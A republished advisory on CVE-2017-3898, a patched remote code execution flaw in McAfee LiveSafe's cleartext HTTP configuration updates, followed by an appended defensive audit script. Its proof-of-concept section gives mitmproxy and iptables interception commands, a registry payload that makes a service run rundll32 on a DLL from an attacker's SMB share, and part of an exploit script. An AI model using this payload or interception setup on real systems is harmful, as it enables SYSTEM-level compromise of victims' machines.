McAfee LiveSafe MiTM RCE Vulnerability CVE-2017-3898 Research - Vulnerability Warning - Black Bar Safety Net

2017-09-19T00:00:00
ID MYHACK58:62201789366
Type myhack58
Reporter Anonymous
Modified 2017-09-19T00:00:00

Description

Vulnerability overview

This vulnerability affects all versions of McAfee LiveSafe (MLS) prior to 16.0.3 and allows remote code execution. It lets an attacker modify Windows registry values associated with McAfee updates by tampering with the HTTP back-end response. McAfee Security Scan Plus is a diagnostic tool that checks the computer's anti-virus, firewall and web security software, and also scans running programs for threats. The vulnerability was first discovered and reported by Silent Signal. A patch for the vulnerability has now been released: https://service.mcafee.com/webcenter/portal/cp/home/articleview?articleId=TS102714

Vulnerability details

An attacker can achieve remote code execution in multiple McAfee products. The affected products retrieve configuration data over a cleartext HTTP channel from http://COUNTRY.mcafee.com/apps/msc/webupdates/mscconfig.asp, where "COUNTRY" is replaced by the country's two-letter identifier, for example "uk" for the UK or "cn" for China. The response body contains XML-formatted data similar to the following:

    <webservice-response response-version="1.0" frequency="168" verid="1#1316#15#0#2">
      <update>
        <reg key="HKLM\SOFTWARE\McAfee\MSC\Settings\InProductTransaction" name="enable" type="REG_DWORD" value="1" obfuscate="0"/>
      </update>
    </webservice-response>

The response above describes a registry modification, using the reg tag under the "webservice-response/update" path.
This request and the subsequent update are triggered automatically, the first time a specific number of minutes after the software is installed (168 minutes by default). The update is performed by PlatformServiceFW.dll in the McSvHost.exe process, which invokes the mcsvrcnt.exe program with the /update parameter. The McSvHost.exe process runs with SYSTEM privileges, and these are inherited by mcsvrcnt.exe, the program that carries out the registry changes. As a result, an attacker who can modify the server response is able to write to the registry with SYSTEM privileges.

PoC

The vulnerability can be exploited by using a proxy to intercept and modify the plaintext HTTP requests and responses. Because the software does validate certificates on HTTPS services, those connections must be passed through without modification. In regular HTTP proxy mode, this can be done with mitmproxy's --ignore command-line parameter:

    mitmproxy -s mcreggeli_inline.py --ignore '.*'

In transparent proxy mode, the above parameter should not be supplied:

    mitmproxy -s mcreggeli_inline.py -T

For transparent proxy mode, the following commands set up NAT and port redirection on Debian-based Linux distributions; here eth0 is the interface visible to the target and eth1 is connected to the network:

    iptables -t nat -A PREROUTING -i eth0 -p tcp \
        --dport 80 -j REDIRECT --to 8080
    iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
    sysctl net.ipv4.ip_forward=1

The script looks for the "mscconfig.asp" string in the request URL. If it is found, the XML response body is deserialized and new reg nodes are added based on the REG variable declared at the top of the script. The REG variable is a list of dictionaries, each of which contains the following keys:

- key: the name of the registry key to modify (for example "HKLM\SYSTEM\CurrentControlSet\Services\mfevtp"; the backslashes must be escaped in Python);
- type: the type of the value to create (for example the string "REG_SZ");
- name: the name of the value to create;
- value: the value to create.

The exploit also changes the frequency attribute to 1 so that, if re-exploitation is needed, it can be carried out within a shorter period of time (1 hour). After the new nodes are added, the object is serialized and put in place of the original response body.

To demonstrate, we overwrite the service entry of one of the affected McAfee components, mfevtp (the McAfee process validation service), at HKLM\SYSTEM\CurrentControlSet\Services\mfevtp, and replace its value with a rundll32.exe invocation whose UNC path parameter points to the attacker's host. Here, the payload test.dll is served with Metasploit's smb_delivery module. The REG variable is declared as follows:

    REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp",
          "type":"REG_SZ","name":"ImagePath",
          "value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},]

As a result, after the computer is restarted, SYSTEM-level command execution is triggered without being detected by the McAfee software.

mcreggeli_inline.py

    #!/usr/bin/env python3
    #
    # HTTP proxy mode:
    #   mitmproxy -s mcreggeli_inline.py --ignore '.*'
    #
    # Transparent proxy mode:
    #   mitmproxy -s mcreggeli_inline.py -T --host
    #

    from mitmproxy import ctx, http
    from lxml import etree

    REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp","type":"REG_SZ","name":"ImagePath","value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},]

    def response(flow):
        # Only plaintext HTTP responses for the configuration URL are touched
        if flow.request.scheme == "http" and "mscconfig.asp" in flow.request.url:
            try:
                oxml=etree.XML(flow.response.content)
                oxml.set("frequency","1")
                # (the listing continues on the next page of the original article)
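A defensive check for the response format described above, as an added example that is not part of the original article or of any McAfee code: it audits a captured mscconfig.asp response body for registry writes outside the McAfee subtree, UNC paths in written values, and a lowered frequency. The allowed key prefix, the 168 baseline, the name audit_mscconfig and both sample bodies are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Assumptions of this example: legitimate updates stay inside McAfee's own
# subtree (as in the article's sample response) and 168 is the usual frequency.
ALLOWED_PREFIX = "HKLM\\SOFTWARE\\MCAFEE\\"
NORMAL_FREQUENCY = 168
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")  # \\host\share

def audit_mscconfig(body: bytes) -> list:
    """Return a list of findings for one captured mscconfig.asp response body."""
    # Refuse DTDs and entities instead of handing them to the XML parser.
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return ["DTD or entity declaration present, not parsed"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return ["unparseable XML: %s" % exc]
    findings = []
    freq = root.get("frequency", "")
    if not freq.isdigit() or int(freq) < NORMAL_FREQUENCY:
        findings.append("frequency is %r, expected %d" % (freq, NORMAL_FREQUENCY))
    for reg in root.iterfind("./update/reg"):
        key = reg.get("key", "")
        if not key.upper().startswith(ALLOWED_PREFIX):
            findings.append("registry write outside McAfee subtree: " + key)
        if UNC_PATH.search(reg.get("value", "")):
            findings.append("UNC path in value written to " + key)
    return findings

# Constructed samples: CLEAN mirrors the response shown in the article,
# TAMPERED carries the kind of change the article describes (placeholder host).
CLEAN = (b'<webservice-response response-version="1.0" frequency="168" '
         b'verid="1#1316#15#0#2"><update><reg '
         b'key="HKLM\\SOFTWARE\\McAfee\\MSC\\Settings\\InProductTransaction" '
         b'name="enable" type="REG_DWORD" value="1" obfuscate="0"/>'
         b'</update></webservice-response>')
TAMPERED = (b'<webservice-response response-version="1.0" frequency="1" '
            b'verid="1#1316#15#0#2"><update><reg '
            b'key="HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp" '
            b'name="ImagePath" type="REG_SZ" '
            b'value="rundll32.exe \\\\192.0.2.10\\share\\x.dll,0"/>'
            b'</update></webservice-response>')

if __name__ == "__main__":
    for label, body in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(label, audit_mscconfig(body))
```

The same function can be run over response bodies exported from a proxy or packet capture; an empty list means none of the three conditions was met.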
